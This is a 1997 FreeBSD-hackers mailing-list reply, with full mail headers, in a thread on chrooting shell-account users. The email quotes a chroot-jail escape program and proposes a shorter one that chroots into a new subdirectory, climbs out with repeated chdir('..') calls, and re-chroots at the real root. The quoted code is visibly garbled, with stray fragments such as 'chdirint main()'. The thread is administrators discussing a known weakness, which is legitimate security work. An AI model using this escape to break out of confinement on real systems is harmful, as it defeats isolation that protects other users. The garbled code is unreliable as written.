From owner-freebsd-hackers Thu May 29 17:24:34 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id RAA17711 for hackers-outgoing; Thu, 29 May 1997 17:24:34 -0700 (PDT) Received: from alpo.whistle.com (alpo.whistle.com [207.76.204.38]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id RAA17699 for ; Thu, 29 May 1997 17:24:23 -0700 (PDT) Received: (from daemon@localhost) by alpo.whistle.com (8.8.5/8.8.5) id RAA01859; Thu, 29 May 1997 17:16:37 -0700 (PDT) Received: from current1.whistle.com(207.76.205.22) via SMTP by alpo.whistle.com, id smtpd001857; Fri May 30 00:16:37 1997 Message-ID: <338E1C3B.2781E494@whistle.com> Date: Thu, 29 May 1997 17:15:55 -0700 From: Julian Elischer Organization: Whistle Communications X-Mailer: Mozilla 3.0Gold (X11; I; FreeBSD 2.2-CURRENT i386) MIME-Version: 1.0 To: Warner Losh CC: Terry Lambert , dec@phoenix.its.rpi.edu, peter@grendel.IAEhv.nl, mrcpu@cdsnet.net, hackers@FreeBSD.ORG Subject: Re: Correct way to chroot for shell account users? References: <199705291456.HAA03526@phaeton.artisoft.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-hackers@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk > Michael Smith posted the program to climb out of the jail here a few > months ago. This isn't theoretical, but it works. It was something > along the lines of the following. You can find it in the archives. > > int main() > { > int fd; > > > fd = open("/"); > /xxx"); > fchdir(fd); > chdir(".."); > chdir(".."); > chdir(".."); > chdir(".."); > chdir(".."); > chdir(".."); > chdirint main()(".."); > chdir(".."); > chdir(".."); > chdir(".."); > chdir(".."); > chdir(".."); > chdir(".."); > } this is overly complicated... how about: int main(){ mkdir( "xxx"); chroot("xxx"); chdir(".."); chdir(".."); etc.. chroot("."); }